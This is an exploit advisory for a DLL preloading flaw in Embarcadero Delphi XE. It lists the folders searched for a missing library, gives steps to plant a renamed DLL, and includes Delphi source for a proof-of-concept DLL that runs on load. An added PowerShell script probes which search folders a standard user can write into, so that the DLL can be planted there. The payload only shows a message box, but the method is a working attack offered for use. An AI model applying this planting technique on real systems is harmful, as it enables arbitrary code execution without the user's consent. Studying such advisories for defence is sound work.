Exploit Title : [Embarcadero Delphi XE (2011), DLL preloading exploit]
Author        : [STRELiTZIA]
Software      : [Delphi XE (2011)]
Tested on     : [Windows XP SP3]

============================
= Description =
============================

Delphi XE searches for and loads a NON-EXISTENT library, "dcc150il.dll",
without any integrity check and without any visual warning about a
modified or unexpected library. Because the file does not ship with the
product, the loader walks the DLL search order below and loads the first
"dcc150il.dll" it finds. An attacker who can write a file of that name
into one of those folders can execute arbitrary code locally, without
user consent, in the privilege context of the targeted application.

============================
= Instructions =
============================

Default search folders (in order):

%C%:\Program Files\Embarcadero\RAD Studio\8.0\bin\dcc150il.dll
%C%:\WINDOWS\system32\dcc150il.dll
%C%:\WINDOWS\system\dcc150il.dll
%C%:\WINDOWS\dcc150il.dll
%C%:\Documents and Settings\%User%\%My documents%\RAD Studio\Projects\dcc150il.dll
%C%:\Documents and Settings\All Users\Documents\RAD Studio\8.0\BPL\dcc150il.dll
%C%:\WINDOWS\system32\wbem\dcc150il.dll

1- Copy "Test.dll" into one of the listed folders.
2- Rename "Test.dll" to "dcc150il.dll".
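The following PowerShell script is an added example and is not part of STRELiTZIA's advisory. It walks the search folders listed above in the same order, reports whether a "dcc150il.dll" is already present in each (an existing one is either a planted file or a sign the advisory's search list is stale), and probes whether the current user can create a file there, which tells you which locations can be abused without elevated privileges (on the tested XP layout the user's "My Documents\RAD Studio\Projects" and "All Users\Documents\RAD Studio\8.0\BPL" folders are user-writable, while the bin folder and the Windows folders normally are not). It assumes the Windows XP folder layout the advisory lists, maps "%C%" and "%User%" to the usual environment variables, and should be run as the same user that launches Delphi XE; on 64-bit or newer Windows the RAD Studio and All Users paths may differ and the $searchDirs list must be adjusted.

```powershell
# Added example, not part of the original advisory.
# Enumerates the DLL search folders listed in the advisory (XP layout assumed)
# and reports, per folder: does it exist, is dcc150il.dll already there, and
# can the current user create a file in it (i.e. plant the DLL).

$dllName = 'dcc150il.dll'

# Same order as the advisory's "Default search folders" list.
# %C% -> $env:SystemDrive / $env:ProgramFiles / $env:SystemRoot
# %User%\My Documents -> [Environment]::GetFolderPath('MyDocuments')
# All Users\Documents -> $env:ALLUSERSPROFILE\Documents  (XP layout, assumption)
$searchDirs = @(
    (Join-Path $env:ProgramFiles 'Embarcadero\RAD Studio\8.0\bin'),
    (Join-Path $env:SystemRoot   'system32'),
    (Join-Path $env:SystemRoot   'system'),
    $env:SystemRoot,
    (Join-Path ([Environment]::GetFolderPath('MyDocuments')) 'RAD Studio\Projects'),
    (Join-Path $env:ALLUSERSPROFILE 'Documents\RAD Studio\8.0\BPL'),
    (Join-Path $env:SystemRoot   'system32\wbem')
)

function Test-UserCanWrite {
    param([string]$Directory)
    # Probe by actually creating and deleting a uniquely named file; this is
    # more reliable than interpreting the ACL by hand (group membership,
    # inherited DENY entries, etc.).
    $probe = Join-Path $Directory ('probe_{0}.tmp' -f ([guid]::NewGuid().ToString('N')))
    try {
        [IO.File]::WriteAllText($probe, '')
        Remove-Item -LiteralPath $probe -Force
        return $true
    } catch {
        return $false
    }
}

$results = foreach ($dir in $searchDirs) {
    $exists  = Test-Path -LiteralPath $dir -PathType Container
    $present = $exists -and (Test-Path -LiteralPath (Join-Path $dir $dllName) -PathType Leaf)
    $writable = $false
    if ($exists) { $writable = Test-UserCanWrite -Directory $dir }

    New-Object PSObject -Property @{
        Order        = [array]::IndexOf($searchDirs, $dir) + 1
        Directory    = $dir
        Exists       = $exists
        DllPresent   = $present
        UserCanWrite = $writable
    }
}

$results | Sort-Object Order | Format-Table Order, Exists, DllPresent, UserCanWrite, Directory -AutoSize

# The first folder in search order that already contains the DLL is the one
# Delphi XE will load; any DllPresent = True row deserves a hash and a look.
$hit = $results | Sort-Object Order | Where-Object { $_.DllPresent } | Select-Object -First 1
if ($hit) {
    $path = Join-Path $hit.Directory $dllName
    Write-Warning ("{0} exists at search position {1}: {2}" -f $dllName, $hit.Order, $path)
    Get-Item -LiteralPath $path | Select-Object FullName, Length, LastWriteTime
}
```

Run it from the account that normally launches the IDE, not from an elevated administrator console, or the UserCanWrite column will overstate what a standard user can do. Any folder that is both earlier in the search order than the one you intend to plant in and already contains the DLL will win, so the Order column matters when reading the result.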
============================
= Tests =
============================

- Launch Embarcadero Delphi XE.
- File ->> New ->> VCL Forms Application - Delphi.
- The message box from the planted library appears, proving the DLL was
  loaded into the IDE process.

============================
= Test DLL Source "Delphi" =
============================

library Test;

uses
  Windows;

// The main block of a Delphi library runs when the DLL is loaded into the
// process (DLL_PROCESS_ATTACH), so this executes as soon as Delphi XE
// resolves and loads "dcc150il.dll"; no exported function needs to be called.
begin
  MessageBoxA(0,
    PChar('Yep, I''m running in your system without your permission.'),
    PChar('Sample'),
    MB_ICONSTOP);
end.